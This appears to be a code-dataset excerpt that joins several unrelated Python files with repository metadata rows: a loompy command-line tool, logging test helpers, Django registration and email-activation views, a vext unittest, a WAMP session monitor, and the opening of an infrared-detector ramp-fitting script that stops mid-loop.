# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from typing import *
from mypy_extensions import NoReturn
import sys
import os
import argparse
import logging
import warnings
import loompy
from ._version import __version__
from .loom_expand import LoomExpand
from .loom_datasets import def_dataset_dir, LoomDatasets
from .loom_server import start_server
class VerboseArgParser(argparse.ArgumentParser):
    """ArgumentParser that prints the full help text before any usage error."""

    def error(self, message: str) -> NoReturn:
        # Show the complete help first so the user sees the valid options,
        # then report the problem on stderr and exit with status 2.
        self.print_help()
        print("\nerror: %s" % message, file=sys.stderr)
        sys.exit(2)
def tile_command(
        datasets: LoomDatasets,
        filenames: List[str],
        projects: List[str],
        all_files: bool,
        truncate: bool) -> None:
    """Pre-generate heatmap tiles for the selected loom files.

    Selection is the union of: every file (when all_files), files whose
    name matches an entry of filenames, and every file in each listed
    project. `matches` is a set, so each file is tiled at most once.
    Prints usage help when nothing was selected.
    """
    # do not expand tiles more than once for any given filename
    matches = set()  # type: Set[Tuple[str, str, str]]

    if all_files:
        matches = datasets.list.all_files()
    else:
        if filenames is not None:
            for filename in filenames:
                matches |= datasets.list.matching_filenames(filename)
        if projects is not None:
            for project in projects:
                matches |= datasets.list.files_in_project(project)

    if not matches:
        # logging.warn is deprecated; use warning().
        logging.warning("""
    Must explicitly state what to tile! See also:
        loom tile --help
    To generate tiles for every loom file in the default dataset folder, type:
        loom tile --all
    To use a different dataset path, use `--dataset-path DATASET_PATH`. Note that
    this must be put before the tile command:
        loom --dataset-path DATASET_PATH tile [input for tile command]
    To generate tiles for any loom file in the default dataset folder that matches
    the names of FILE1, FILE2, etc, type:
        loom tile FILE1 FILE2
    To replace old tiles with new ones, add the -t or --truncate flag
        loom tile FILE -t
    To generate tiles only for one specific file, even if there are multiple files
    with the same name, use the absolute path:
        loom tile /path/to/FILE1 FILE2
    To tile all files in one or more project folders, type:
        loom tile --project PROJECT1 PROJECT2
    Combining file and project paths is possible:
        loom /path/to/FILE1 FILE2 --project PROJECT
    Putting it all together: the following points to a non-default dataset path,
    and generates tiles for one specific FILE, as well as all files in PROJECT,
    while discarding any previously generated tiles:
        loom --dataset-path DATASET_PATH tile /path/to/FILE --project PROJECT -t
""")
    else:
        for project, filename, file_path in matches:
            # Original logged the literal "{file_path}" (missing f-prefix);
            # use lazy %-style args instead.
            logging.info("Tiling %s", file_path)
            datasets.tile(project, file_path, truncate)
def expand_command(
        datasets: LoomDatasets,
        filenames: List[str],
        projects: List[str],
        all_files: bool,
        clear: bool,
        metadata: bool,
        attributes: bool,
        rows: bool,
        cols: bool,
        truncate: bool) -> None:
    """Expand (or clear) cached JSON for the selected loom files.

    At least one action flag (clear/metadata/attributes/rows/cols) must
    be set, otherwise usage help is printed and nothing happens.
    """
    if not (clear or metadata or attributes or rows or cols):
        # logging.warn is deprecated; use warning().
        logging.warning("""
    `loom expand` pre-generates cache for the loom-viewer, for faster serving.
    This is a slow process, so that the command requires that you explicitly state
    which cache to generate ("expand"), and for which loom file(s).
    See also:
        loom expand --help
    Currently, the following separate types of cache can be expanded with these flags:
        -m, --metadata    general metadata
        -a, --attributes  row and column attributes
        -r, --rows        rows (genes)
        -c, --cols        columns (cells, currently not used)
    In the following examples, we will expand metadata, attributes and all rows
    all at once via -mar.
    To expand all loom files matching the name FILE1, FILE2, etc in the default
    loom datasets folder, type:
        loom expand FILE1 FILE2 -mar
    To expand a specific file, even if there are multiple files
    with the same name, use the absolute path:
        loom tile /path/to/FILE1 FILE2
    To use a different dataset path, use `--dataset-path DATASET_PATH`. Note that
    this must be put before the tile command:
        loom --dataset-path DATASET_PATH expand FILE -mar
    To apply expansion to all loom files, use --all or -A:
        loom expand -marA
    To apply expansion to all loom files in one or more project folders, type:
        loom expand --project PROJECT1 PROJECT2 -mar
    By default, previously expanded metadata is left alone. To force replacing this
    expanded data, use --truncate or -t:
        loom expand FILE -marT
    To remove ALL previously generated cache (except tiles), use --clear or -C
        loom expand FILE -C
    Putting it all together: the following points to a non-default dataset path,
    finds one specific FILE, as well as all files in PROJECT. For these files,
    any existing expanded metadata is first deleted, then new general metadata and
    attributes are expanded (but not rows)
    while discarding any previously generated tiles:
        loom --dataset-path DATASET_PATH expand /path/to/FILE --project PROJECT -maC
""")
        return

    matches = set()  # type: Set[Tuple[str, str, str]]
    if all_files:
        matches = datasets.list.all_files()
    else:
        for filename in filenames:
            matches |= datasets.list.matching_filenames(filename)
        for project in projects:
            matches |= datasets.list.files_in_project(project)

    for project, filename, file_path in matches:
        # Construct outside the try: the original's `except` referenced
        # `expand` even when the constructor itself raised, turning the
        # real error into a NameError.
        expand = LoomExpand(project, filename, file_path)
        try:
            if not expand.closed:
                if clear:
                    expand.clear_metadata()
                    expand.clear_attributes()
                    expand.clear_rows()
                    expand.clear_columns()
                if metadata:
                    expand.metadata(truncate)
                if attributes:
                    expand.attributes(truncate)
                if rows:
                    expand.rows(truncate)
                if cols:
                    expand.columns(truncate)
        finally:
            # Always release the file; if an exception is propagating,
            # `finally` preserves its traceback (unlike the old `raise e`).
            expand.close()
def parse_args(def_dir: str) -> Any:
    """Build the CLI (version / server / tile / expand subcommands) and parse argv.

    def_dir is the default dataset directory, used both as the default
    value and in the help text of --dataset-path.
    """
    parser = VerboseArgParser(description="Loom command-line tool.")
    parser.add_argument(
        "--debug",
        action="store_true",
        help="Show verbose debug output (False by default)"
    )
    parser.add_argument(
        "--dataset-path",
        help="Path to datasets directory (default: %s)" % def_dir,
        nargs='?',
        const=def_dir,
        default=def_dir
    )

    subparsers = parser.add_subparsers(title="subcommands", dest="command")

    # loom version
    version_parser = subparsers.add_parser("version", help="Print version")

    # loom server
    server_parser = subparsers.add_parser(
        "server",
        help="Launch loom server (default command)"
    )
    server_parser.add_argument(
        "--show-browser",
        help="Automatically launch browser (False by default)",
        action="store_true"
    )
    server_parser.add_argument(
        "-p",
        "--port",
        help="Port",
        type=int,
        nargs='?',
        const=8003,
        default=8003
    )

    # loom tile
    tile_parser = subparsers.add_parser("tile", help="Precompute heatmap tiles")
    tile_parser.add_argument(
        "file",
        help="""Loom file(s) to expand.
        Expands all files matching the provided file names.
        To avoid this, use an absolute path to specify a single file.
        """,
        nargs='*',
    )
    tile_parser.add_argument(
        "--project",
        help="Project(s) for which to expand all files.",
        nargs='*',
    )
    tile_parser.add_argument(
        "-A",
        "--all",
        help="Expand all loom files.",
        action="store_true"
    )
    tile_parser.add_argument(
        "-t",
        "--truncate",
        help="Remove previously expanded tiles if present (false by default)",
        action="store_true"
    )

    # loom expand
    expand_help = "Expands data to compressed json files. Processes all matching loom filenames in dataset_path, unless absolute path is passed"
    expand_parser = subparsers.add_parser(
        "expand",
        help=expand_help
    )
    expand_parser.add_argument(
        "file",
        help="""Loom file(s) to expand.
        Expands all files matching the provided file names.
        To avoid this, use an absolute path to specify a single file.
        When combined with --clear it clears all expanded files instead.
        """,
        nargs='*',
    )
    expand_parser.add_argument(
        "--project",
        help="Project(s) for which to expand all files (or clear expansion with --clear).",
        nargs='*',
    )
    expand_parser.add_argument(
        "-A",
        "--all",
        help="Expand all loom files (or clear expansion with --clear).",
        action="store_true"
    )
    expand_parser.add_argument(
        "-C",
        "--clear",
        help="Remove previously expanded files.",
        action="store_true"
    )
    expand_parser.add_argument(
        "-t",
        "--truncate",
        help="Replace previously expanded files if present (false by default). Only does something in combination with expansion (-m, -a, -r or -c).",
        action="store_true"
    )
    expand_parser.add_argument(
        "-m",
        "--metadata",
        help="Expand metadata (false by default)",
        action="store_true"
    )
    expand_parser.add_argument(
        "-a",
        "--attributes",
        help="Expand attributes (false by default)",
        action="store_true"
    )
    expand_parser.add_argument(
        "-r",
        "--rows",
        help="Expand rows (false by default)",
        action="store_true"
    )
    expand_parser.add_argument(
        "-c",
        "--cols",
        help="Expand columns (false by default)",
        action="store_true"
    )
    return parser.parse_args()
def main() -> None:
    """Command-line entry point: parse args and dispatch to a subcommand."""
    def_dir = def_dataset_dir()

    # Create a fake args object with default settings
    # to handle the special case of no arguments.
    if len(sys.argv) == 1:
        args = argparse.Namespace()
        setattr(args, "debug", False)
        setattr(args, "dataset_path", def_dir)
        # command/port/show_browser defaults are filled in below
    else:
        args = parse_args(def_dir)

    # Configure logging exactly once. The original called basicConfig a
    # second time further down, which is a silent no-op; the stray
    # `logging.warn("test")` debug line in the tile branch is removed too.
    if args.debug:
        logging.basicConfig(
            level=logging.DEBUG, format="%(asctime)s - %(levelname)s - %(module)s, %(lineno)d - %(message)s")
    else:
        logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(message)s")

    # If only --debug or --dataset-path is passed,
    # we still want to default to the server command
    if 'command' not in args:
        setattr(args, "command", "server")
    if 'port' not in args:
        setattr(args, "port", 8003)
    if 'show_browser' not in args:
        setattr(args, "show_browser", True)

    if args.command == "version":
        print("loom v%s" % __version__)
        sys.exit(0)
    else:
        if args.command == "tile":
            datasets = LoomDatasets(args.dataset_path)
            tile_command(datasets, args.file, args.project, args.all, args.truncate)
        elif args.command == "expand":
            datasets = LoomDatasets(args.dataset_path)
            expand_command(datasets, args.file, args.project, args.all, args.clear, args.metadata, args.attributes, args.rows, args.cols, args.truncate)
        else:  # args.command == "server":
            start_server(args.dataset_path, args.show_browser, args.port, args.debug)
if __name__ == "__main__":
    # Standard script entry point.
    main()
| 26.473568 | 144 | 0.719611 |
c907566de3410b8c828deb59e531487549202dc6 | 1,260 | py | Python | test_function.py | will-huynh/process_controller | e193c80976ef1d35fb9e661425bf609a86a313c8 | [
"MIT"
] | 1 | 2021-12-25T04:08:53.000Z | 2021-12-25T04:08:53.000Z | test_function.py | will-huynh/process_controller | e193c80976ef1d35fb9e661425bf609a86a313c8 | [
"MIT"
] | null | null | null | test_function.py | will-huynh/process_controller | e193c80976ef1d35fb9e661425bf609a86a313c8 | [
"MIT"
] | null | null | null | import logging
import tcp_log_socket
logging_socket = tcp_log_socket.local_logging_socket(__name__)
logger = logging_socket.logger
#Test method simulating a method with required arguments; division is used to test exception handling
def test_args(div1, div2):
    """Divide div1 by div2 with logging; raises ZeroDivisionError when div2 == 0."""
    logger.info("Simulating a method with arguments and exceptions.")
    result = div1 / div2
    logger.info("Quotient is: {}".format(result))
    return result
#Test method simulating a method with no required arguments
def test_no_args():
    """Simulate a no-argument method: log the expected outcome and return True."""
    outcome = True
    logger.info("Simulating methods without arguments.")
    logger.info("Expected result: {}.".format(outcome))
    return outcome
#Test method simulating an argument with keyworded and optional arguments
def test_keyword(def_num=10, **kwargs):
    """Return (def_num, value) where value comes from the 'key' kwarg, else False."""
    logger.info("Simulating methods with optional and keyworded arguments.")
    allowed_key = "key"
    value = False
    logger.info("Default argument is {}.".format(def_num))
    # Iterate over a snapshot of the keys so pop() inside the loop is safe.
    for kw in list(kwargs):
        if kw == allowed_key:
            logger.info("Keyword found.")
            value = kwargs.pop(kw)
            logger.info("Keyword and value are {0} : {1}.".format(kw, value))
    return (def_num, value)
| 37.058824 | 102 | 0.692857 |
c908908fcda77dbed54b6f285d7d03c69d799dc0 | 3,154 | py | Python | users/views.py | elvinaqa/Amazon-Review-Analyzer-Summarizer-Python-NLP-ML- | 6c70e84ffbcb8c8fd65a7fe0847e1f0eb779f759 | [
"Unlicense"
] | 1 | 2020-09-10T11:26:05.000Z | 2020-09-10T11:26:05.000Z | users/views.py | elvinaqa/Amazon-Review-Analyzer-Summarizer-Python-NLP-ML- | 6c70e84ffbcb8c8fd65a7fe0847e1f0eb779f759 | [
"Unlicense"
] | null | null | null | users/views.py | elvinaqa/Amazon-Review-Analyzer-Summarizer-Python-NLP-ML- | 6c70e84ffbcb8c8fd65a7fe0847e1f0eb779f759 | [
"Unlicense"
] | null | null | null | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
#####################################################################
from django.http import HttpResponse
from django.contrib.auth import login, authenticate
from .forms import UserRegisterForm
from django.contrib.sites.shortcuts import get_current_site
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.template.loader import render_to_string
from .tokens import account_activation_token
from django.contrib.auth.models import User
from django.core.mail import EmailMessage
def register(request):
    """Handle sign-up: create an inactive user and e-mail an activation link."""
    if request.method == 'POST':
        form = UserRegisterForm(request.POST)
        if form.is_valid():
            user = form.save(commit=False)
            # Account stays inactive until the e-mailed token is confirmed
            # by the activate() view.
            user.is_active = False
            user.save()
            current_site = get_current_site(request)
            mail_subject = 'Activate your account.'
            message = render_to_string('acc_active_email.html',{
                'user':user,
                'domain': current_site.domain,
                'uid':urlsafe_base64_encode(force_bytes(user.pk)),
                'token':account_activation_token.make_token(user),
            })
            to_email = form.cleaned_data.get('email')
            email = EmailMessage(
                mail_subject, message, to=[to_email]
            )
            email.send()
            return render(request, 'users/activation_info.html')
    else:
        form = UserRegisterForm()
    # Invalid POSTs fall through here with the bound form (errors shown).
    return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
    """Show and update the logged-in user's account and profile forms."""
    if request.method == 'POST':
        u_form = UserUpdateForm(request.POST, instance=request.user)
        p_form = ProfileUpdateForm(request.POST,
                                   request.FILES,
                                   instance=request.user.profile)
        if u_form.is_valid() and p_form.is_valid():
            u_form.save()
            p_form.save()
            messages.success(request, f'Your account has been updated!')
            # POST/redirect/GET so a browser refresh does not resubmit.
            return redirect('profile')
    else:
        u_form = UserUpdateForm(instance=request.user)
        p_form = ProfileUpdateForm(instance=request.user.profile)

    context = {
        'u_form': u_form,
        'p_form': p_form,
    }

    return render(request, 'users/profile.html', context)
def activate(request, uidb64, token):
    """Validate an e-mailed activation link; activate and log in the user."""
    try:
        uid = urlsafe_base64_decode(uidb64).decode()
        user = User.objects.get(pk=uid)
    except(TypeError, ValueError, OverflowError, User.DoesNotExist):
        # Malformed uid or unknown user: treat the link as invalid.
        user = None
    if user is not None and account_activation_token.check_token(user, token):
        user.is_active = True
        user.save()
        login(request, user)
        # return redirect('home')
        return render(request,'analyzer/home.html',{'message1':'Succesfull'})
    else:
        return render(request,'users/email_confirm_complete.html',{'message1':'Failed'})
| 38.463415 | 88 | 0.642676 |
c909851fe73dcfad421fb6354ea395215029d6a8 | 689 | py | Python | tests/test-vext-pth.py | NomAnor/vext | adea4b593ae4c82da0965ec1addaa1cd6d5b396c | [
"MIT"
] | 62 | 2015-03-25T15:56:38.000Z | 2021-01-07T21:32:27.000Z | tests/test-vext-pth.py | NomAnor/vext | adea4b593ae4c82da0965ec1addaa1cd6d5b396c | [
"MIT"
] | 73 | 2015-02-13T16:02:31.000Z | 2021-01-17T19:35:10.000Z | tests/test-vext-pth.py | NomAnor/vext | adea4b593ae4c82da0965ec1addaa1cd6d5b396c | [
"MIT"
] | 8 | 2016-01-24T16:16:46.000Z | 2020-09-23T17:56:47.000Z | import os
import unittest
from vext.install import DEFAULT_PTH_CONTENT
class TestVextPTH(unittest.TestCase):
    """Checks on the .pth file content that vext installs."""
    # Preliminary test, that verifies that
    def test_can_exec_pth_content(self):
        """Every 'import ...' line in the default .pth content must exec() cleanly."""
        # Stub test, verify lines starting with 'import' in the pth can
        # be exec'd and doesn't raise any exceptions.
        # TODO, mock file.write and get content directly from create_pth
        # instead of getting it directly from DEFAULT_PTH_CONTENT
        lines = DEFAULT_PTH_CONTENT.splitlines()
        for line in lines:
            if line.startswith("import ") or line.startswith("import\t"):
                exec(line)
if __name__ == "__main__":
unittest.main()
| 28.708333 | 73 | 0.683599 |
c9098d28bd2a0a51fc33c4cd5fecc41dc7fc38ec | 2,196 | py | Python | stats/monitor.py | pawankaushal/crossbar-examples | b6e0cc321bad020045c4fafec091f78abd938618 | [
"Apache-2.0"
] | 97 | 2016-12-14T16:48:49.000Z | 2021-09-12T17:48:10.000Z | stats/monitor.py | pawankaushal/crossbar-examples | b6e0cc321bad020045c4fafec091f78abd938618 | [
"Apache-2.0"
] | 38 | 2016-12-13T09:42:38.000Z | 2020-07-05T11:58:07.000Z | stats/monitor.py | pawankaushal/crossbar-examples | b6e0cc321bad020045c4fafec091f78abd938618 | [
"Apache-2.0"
] | 118 | 2016-12-12T21:36:40.000Z | 2021-11-17T11:49:33.000Z | import argparse
from pprint import pformat
import txaio
txaio.use_twisted()
from autobahn.twisted.wamp import ApplicationSession, ApplicationRunner
class ClientSession(ApplicationSession):
    """WAMP session that subscribes to router session meta-events and logs them."""

    async def onJoin(self, details):
        """Called when the session joins the realm: subscribe to meta topics."""
        print('MONITOR session joined: {}'.format(details))

        # Extra config passed by the runner; example shape:
        # {'market-url': '', 'market-realm': '', 'delegate-key': '../.xbr.key'}
        xbr_config = self.config.extra['xbr']
        print(xbr_config)

        def on_session_join(session_details):
            self.log.info('>>>>>> MONITOR : session joined\n{session_details}\n',
                          session_details=pformat(session_details))

        await self.subscribe(on_session_join, 'wamp.session.on_join')

        def on_session_stats(session_details, stats):
            self.log.info('>>>>>> MONITOR : session stats\n{session_details}\n{stats}\n',
                          session_details=pformat(session_details), stats=pformat(stats))

        await self.subscribe(on_session_stats, 'wamp.session.on_stats')

        def on_session_leave(session_id):
            self.log.info('>>>>>> MONITOR : session {session_id} left',
                          session_id=session_id)

        await self.subscribe(on_session_leave, 'wamp.session.on_leave')
if __name__ == '__main__':
    # Entry point: parse CLI options, configure txaio logging, and run the
    # monitoring session with automatic reconnection.
    parser = argparse.ArgumentParser()
    parser.add_argument('-d',
                        '--debug',
                        action='store_true',
                        help='Enable debug output.')
    parser.add_argument('--url',
                        dest='url',
                        type=str,
                        default="ws://localhost:8080/ws",
                        help='The router URL (default: "ws://localhost:8080/ws").')
    parser.add_argument('--realm',
                        dest='realm',
                        type=str,
                        default="realm1",
                        help='The realm to join (default: "realm1").')
    args = parser.parse_args()

    if args.debug:
        txaio.start_logging(level='debug')
    else:
        txaio.start_logging(level='info')

    runner = ApplicationRunner(url=args.url, realm=args.realm)
    runner.run(ClientSession, auto_reconnect=True)
| 31.826087 | 89 | 0.583789 |
c90c7861eaff4add66e4d61ef78a76a073959d73 | 29,349 | py | Python | spirou/sandbox/fits2ramp.py | clairem789/apero-utils | 68ed0136a36b6badeaf15eb20d673052ad79a949 | [
"MIT"
] | 2 | 2020-10-08T17:03:45.000Z | 2021-03-09T17:49:44.000Z | spirou/sandbox/fits2ramp.py | clairem789/apero-utils | 68ed0136a36b6badeaf15eb20d673052ad79a949 | [
"MIT"
] | 17 | 2020-09-24T17:35:38.000Z | 2020-12-11T16:10:13.000Z | spirou/sandbox/fits2ramp.py | clairem789/apero-utils | 68ed0136a36b6badeaf15eb20d673052ad79a949 | [
"MIT"
] | 5 | 2020-04-10T06:41:00.000Z | 2020-12-16T21:09:14.000Z | #!/usr/bin/env python2.7
# Version date : Aug 21, 2018
#
# --> very minor correction compared to previous version. As keywords may change in files through time, when we delete
# a keyword, we first check if the keyword is preseent rather than "blindly" deleting it
# --> also corrected integer vs float divisions in refpixcor. This ensures python3 compatibility
#
# Version date : May 29, 2018
#
# --> The first frame is used as a "bias" for all subsequent readouts
# Subsequent frames are corrected for reference pixels
# This significantly improves the quality of the error measurement
# --> The top/bottom reference pixels are always corrected in odd/even manner, not as a constant offset for odd/even columns
# --> We now perform the non-linearity measurement
# --> All the "print" statement have been made consistent with the python3
# --> Add the "selfbias" keyword. This option uses the 1st readout as a bias estimate. This allows ref pixel correction per frame
#
# Version date : Mar 23, 2018
#
# --> corrects an error in the ref pixels
# --> Nothing changed to the input syntax compared to previous versions
#
# - accepts both H2RG and H4RG data. The size of the images is determined
# from the calibration files given in input, avoiding hardcoding the size
# of the input images. I removed all references to dim1 and dim2 (x and y size of
# images) as we will always have square images. This is now simply imdim. Imdim can
# only be equal to 2048 or 4096. If not, then something is really wrong and the code exits
# with a message.
#
# - uses pixels on the side of the array and not only top/bottom ones
# filters 1/f noise with side pixels. Important for the H4RG data
#
# - ramp algorithm significantly faster as we took some variable handling out the big loop. Does not
# change the output values in the end. sx and sx2 are now determined only at the end of the
# loop on image by using the timestamp vector combined with the n variable. Saves ~0.5s per readout
#
# - medians are now handling nans properly; avoids problems in rare cases when a nan appears in the
# ref pixel region. nanmedian exists in python3 but not python2, so I defined the function
# here. When we'll switch to p3, we can simply delete this function and we won't
# need to modify the code itself. We'll juste need : import numpy.nanmedian as nanmedian
#
# - if the bias frame is set entirely to zero (mostly for debugging purpose), then we avoid
# subtracting zeros to the entire image and save ~0.1s per image.
#
# - ref pixel filtering is defined as a function. This was done at two places in the
# code.
#
# - the reference pixel function is much faster thanks to some more clever handling
# of variables.
#
# - the flux in the "mask" region used now uses np.nanmean instead of mean. This avoids
# having a NaN flux measurement in the posemeter. It also avoids problems when writing
# the posemeter values in the header as one cannot have a NaN as a keyword value.
#
# - we now have an ascii output per iteration that tell you how long each frame took to
# process and how long is left before the end of the big loop. On our machine, the
# average for an H2RG image with the "-noerror" keyword (faster) is slightly less than
# 1 s per image.
#
#
# Now includes the following options :
#
# -n=XXX -> Will only perform the ramp fitting on the first XXX readouts of the array
# This can be used to simulate a shorter sequence. This could be useful to get the
# dark that exactly matches the integration time of a given science sequence. Say you
# have a dark of 100 frames but a science sequence of 20 frames, you may want to only use
# the first 20 frames of the dark to get exactly the same statistical properties as in your
# science sequence.
# -cube -> set this to get an output cube with all readouts. Use only if you want to examine the readouts.
# -linearize -> corrects for non-linearity. Do not use this keyword to speed things up. We don't have the linearity coefficients in hand anyway
# -noerror -> do not compute the error on slope. This speeds up the code as we need to read the images only once.
# -noref -> Skip all reference pixel corrections entirely
# -selfbias -> subtract the 1st readout from all subsequent readouts to allow ref pixel correction per frame
# -*- coding: utf-8 -*-
from scipy import stats
import numpy as np
from array import *
import glob
import os
# import pyfits --> rendered obsolete by the use of the more recent astropy.io.fits
import time
import sys
import scipy.ndimage.filters
from astropy.io import fits as pyfits
from scipy.stats.stats import pearsonr
def nanmedian(data):
    """Median of the finite values in *data*; NaN if there are none.

    Python 2 backport of numpy's nanmedian. When the code moves to
    Python 3 this can be replaced by np.nanmedian (modulo the handling
    of empty input, which np.nanmedian warns on).
    """
    data2 = np.asarray(data)
    finite = np.isfinite(data2)
    # Use .any() instead of the original `np.max(g) == False`: np.max on
    # an empty mask raises ValueError, so empty input used to crash.
    if data2.size == 0 or not finite.any():
        return np.nan
    return np.median(data2[finite])
def refpixcorr(im,oddeven=False):
    # function that corrects with reference pixels on the sides of the H2RG and H4RG.
    #
    # On the periphery of the arrays, there are 4 pixels that are not light-sensitive
    # and that track drifts in the amplifiers. These are reference pixels and they can
    # reduce the effective readout noise by a factor of at least 2 if properly used.
    #
    # The top and bottom pixels of each output (one of 32 vertical "ribbons") see the
    # start and end of each readout. To filter noise on a readout timescale, we measure
    # the median of the top and bottom reference pixels. We then define a "slope"
    # that interpolates the gradient through the light-sensitive pixels.
    #
    # For some arrays (e.g., the H2RG used for the AT4), the odd and even pixels within
    # each amplifier differ in behaviour. We therefore measure and correct this "slope"
    # independently for odd and even pixels. This is done by setting oddeven=True in the
    # function call. The default is oddeven=False
    #
    # NOTE(review): the oddeven argument is accepted but never used in the body
    # below -- the odd/even split is always applied. Confirm whether a combined
    # (non-split) mode was intended for oddeven=False.
    #
    # The side (x=0-3 and x=N-3:N) of the HxRG arrays see the "faster" 1/f noise that
    # affects all amplifier. We therefore need to subtract the mean of the side reference
    # pixels to remove (most of) the 1/f noise. As the reference pixels are themselves
    # noisy, we apply a median filter to these pixels before subtracting.
    # The size of this running median filter is set with the "medfilterwidth"
    # variable.
    #
    imdim=(np.shape(im))[0]
    # x position of the side reference pixels
    ref_sides = [0, 1, 2, 3,imdim - 4, imdim - 3, imdim - 2, imdim - 1]
    # filtering with ref pixels on either side of image
    medfilterwidth = 15 # value used for JWST H2RGs. Could be modified
    ref=np.zeros(imdim) # contains the median-filter, mean value of the vertical ref pixels
    for xpix in ref_sides:
        ref+=scipy.ndimage.filters.median_filter(im[:,xpix], medfilterwidth)/np.size(ref_sides)
    # pad the ref pixel value into a imdim x imdim square and subtract from image
    im-=np.repeat(ref,imdim).reshape(imdim,imdim) # correct an error, used to be "tile" instead of "repeat", which pads in the wrong direction
    # we filter independently the odd and even pixels in the bottom and top reference regions
    odd_bottom=np.zeros([imdim,imdim//32],dtype=float) # contains a range from 0 to 1 on odd pixels, 1 at bottom, 0 at top
    even_bottom=np.zeros([imdim,imdim//32],dtype=float)
    odd_top=np.zeros([imdim,imdim//32],dtype=float)
    even_top=np.zeros([imdim,imdim//32],dtype=float)
    g_odd_bottom=np.zeros([imdim,imdim//32],dtype=bool) # boolean selection masks: True on the 4 bottom (resp. top) rows of odd (resp. even) columns
    g_even_bottom=np.zeros([imdim,imdim//32],dtype=bool)
    g_odd_top=np.zeros([imdim,imdim//32],dtype=bool)
    g_even_top=np.zeros([imdim,imdim//32],dtype=bool)
    frac=np.asarray(range(imdim))/(imdim-1.0)
    for j in range(imdim//64):
        odd_bottom[:,j*2+1]=1-frac
        even_bottom[:,j*2]=1-frac
        odd_top[:,j*2+1]=frac
        even_top[:,j*2]=frac
        g_odd_bottom[0:4,j*2+1]=True
        g_even_bottom[0:4,j*2]=True
        g_odd_top[imdim-4:imdim,j*2+1]=True
        g_even_top[imdim-4:imdim,j*2]=True
    for j in range(32): # looping through the 32 outputs
        # subtract median value of ref unilluminated pixels, interpolated
        # linearly from bottom (frac=0) to top (frac=1) of each ribbon
        ribbon = im[:,j*imdim//32:(j+1)*imdim//32]
        y_even_bottom = nanmedian( ribbon[g_even_bottom])
        y_odd_bottom = nanmedian( ribbon[g_odd_bottom])
        y_even_top = nanmedian( ribbon[g_even_top])
        y_odd_top = nanmedian( ribbon[g_odd_top])
        im[:,j*imdim//32:(j+1)*imdim//32]-=( y_even_bottom*even_bottom+y_odd_bottom*odd_bottom+y_odd_top*odd_top+y_even_top*even_top)
    return(im)
def patch_shift(im,bias):
    # Detect, via Pearson correlation of row 0 against the bias frame at
    # offsets -1/0/+1, whether the readout columns are shifted by one pixel,
    # and permute the columns back if a shift is detected.
    #
    # NOTE(review): the hard-coded 2048 below means this routine only supports
    # H2RG-sized frames -- confirm before using it on a 4096x4096 H4RG.
    index=np.asarray(range(4,60,2))
    cut1 = 0.2 # max CC for shifts that are invalid
    cut2 = 0.9 # min CC for shifts that is valid
    ccs = np.zeros(3)
    print(np.shape(im))
    i=0
    # ccs[0], ccs[1], ccs[2] = correlation at offsets -1, 0, +1
    for off in range(-1,2):
        ccs[i]= (pearsonr(im[0,index],bias[0,off+index]))[0]
        i+=1
    message = 'Ambiguous Pearson correlation with bias... suspicious data!'
    if (ccs[2] >= cut2) and (ccs[1]<=cut1) and (ccs[0]<=cut1):
        message='We have a pixel shift problem... we correct it!'
        xpix2=np.asarray(range(2048))
        xpix=np.asarray(range(2048))
        x64=np.asarray(range(64))
        # build the column permutation undoing the one-pixel shift within each
        # of the 32 outputs (64 columns per output)
        for i in range(32):
            # NOTE(review): the "(i*32)" base looks suspicious -- each output
            # spans 64 columns, so "(i*64)" would be expected here; as written
            # neighbouring outputs map onto overlapping column ranges. Confirm
            # against known-shifted data before trusting this branch.
            xpix[i*64:i*64+64]=(i*32)+((x64+(2*(i % 2)-1) ) % 64)
        im[:,xpix2]=im[:,xpix]
    if (ccs[1] >= cut2) and (ccs[2]<=cut1) and (ccs[0]<=cut1):
        message = 'all good, there is no mischievous pixel shift in your data!'
    print(message)
    return(im)
# will be set to True if selfbias=True. If we use a file for bias (later update?) then this will also
# change the dobias to True
dobias = False
# Command-line parsing: sys.argv[0] is the program name and is removed.
arg=np.asarray(sys.argv)
arg=arg[1:] # first argument is simply the name of the program and needs to be removed
write_cube = sum(arg=='-cube') ==1. # if set, then we will write cube, if not, then we skip this step that may be long
skip_error = sum(arg=='-noerror') ==1. # if set, we skip slope error
skip_ref = sum(arg=='-noref') ==1. # if set, we skip reference pixel corrections
linearize = sum(arg=='-linearize') ==1. # if set, we correct for non-linearity
selfbias = sum(arg=='-selfbias') ==1. # if set, we correct ref pixels on a frame-to-frame basis
nmax_set=False
for argn in arg:
    if (argn)[0:3] == '-n=':
        nmax_set=True
        # bug fix: np.int was deprecated in NumPy 1.20 and removed in 1.24;
        # the builtin int is the exact equivalent here
        dim3=int( (argn)[3:] )
# here we remove arguments with a "-"
keep=np.zeros(len(arg))
for i in range(len(arg)):
    keep[i] = (arg[i])[0] != '-'
arg=arg[keep ==1] # keep only params not beginning with a "-"
if len(arg)>=1:
    odometer = arg[0] # first argument after program and flags is the output name
fic = arg[1:]
# Read the reference header from the first input and classify the input mode:
# a list of individual files (both flags 0), a single MEF (mef_flag=1, when
# the primary HDU has NAXIS=0), or a single cube (cubefits_flag=1, NAXIS=3).
if len(fic)>=1:
    h = pyfits.getheader(fic[0])
    h2=h # NOTE(review): alias, not a copy -- edits to h also appear in h2
mef_flag=0 # file is a MEF flag
cubefits_flag=0 # file is a CUBE flag
if len(fic) ==1:
    naxis =h['naxis']
    if naxis ==0:
        mef_flag=1# we have a flag to know that the input file is a MEF and that extensions need to be read from there
    if naxis==3:
        cubefits_flag=1#this is a cube
# sanity check: every input path must exist on disk
exists = np.zeros(len(fic),dtype=bool)
for i in range(len(fic)):
    exists[i] = os.path.isfile(fic[i])
if np.sum(exists ==0) !=0:
    print('some files given as inputs do not exist')
    print('missing file(s) --')
    print('')
    missing=fic[exists !=1]
